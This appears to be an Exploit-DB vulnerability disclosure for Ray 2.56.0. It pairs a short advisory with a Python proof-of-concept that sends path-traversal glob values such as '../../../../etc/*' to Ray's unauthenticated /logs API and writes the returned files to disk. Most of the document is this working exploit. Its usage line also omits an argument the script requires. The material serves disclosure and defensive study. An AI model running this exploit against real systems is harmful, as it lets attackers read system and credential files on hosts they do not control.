Ray 2.56.0 - Directory Traversal & Local File Inclusion

EDB-ID:

52635

CVE:

N/A




Platform:

Multiple

Date:

2026-08-11


# Exploit Title: Ray 2.56.0 - Directory Traversal & Local File Inclusion
# Date: 07/12/2026
# Google Dork: N/A
# Exploit Author: Richard Howe (rhowe425@gmail.com)
# Vendor Homepage: https://github.com/ray-project/ray
# Software Link: https://github.com/ray-project/ray
# Version: 2.56.0
# Tested on: Ubuntu 22.04 and RHEL 10.0
# CVE: Pending CNA assignment


A fix has been proposed upstream and is currently under review by the
Ray maintainers.
GH Issue: https://github.com/ray-project/ray/issues/45751
GH Pull Request: https://github.com/ray-project/ray/pull/64701

This proof of concept demonstrates a directory traversal/local file
inclusion vulnerability in Ray's /logs API.
By supplying a crafted glob filter, a remote unauthenticated attacker
can access files outside the intended log directory.
The attached exploit reproduces the issue against Ray 2.56.0 on Ubuntu
22.04 and RHEL 10.0.

Attachments:

- exploit.py (proof of concept)
- Screenshot of successful exploitation
- Screenshot of the pending CVE submission


Usage:
python exploit.py \
--ip <target> \
--port 6379 \
--glob ../../../../etc/*

from sys import argv
from requests import get

def get_arg(name):
    try:
        index = argv.index(name)
        return argv[index + 1]
    except (ValueError, IndexError):
        return None

def main():
    ip = get_arg("--ip")
    port = get_arg("--port")
    node_id = get_arg("--node")
    glob = get_arg("--glob")
    fpath = get_arg("--fpath")
    
    if not ip or not port or not node_id or not glob:
        print("Usage: script.py --ip <address> --port <port> --node <node id> --glob <glob> --fpath <file path>")
        exit(1)

    params = {
        'node_id': node_id,
        'glob': f'{glob}/*'
    }

    print(params)
    
    try:
        req = get(f'http://{ip}:{port}/api/v0/logs', params=params)
    except Exception as e:
        print(str(e))


    if req.status_code == 200 and fpath:
        print('Success! Writing contents to file.')
        with open(fpath, "wb") as f:
            f.write(req.content)
    elif req.status_code == 200:
        print(f'Success!\n{req.content}')
    else:
        print('Failed')
        print(req.content)
        

main()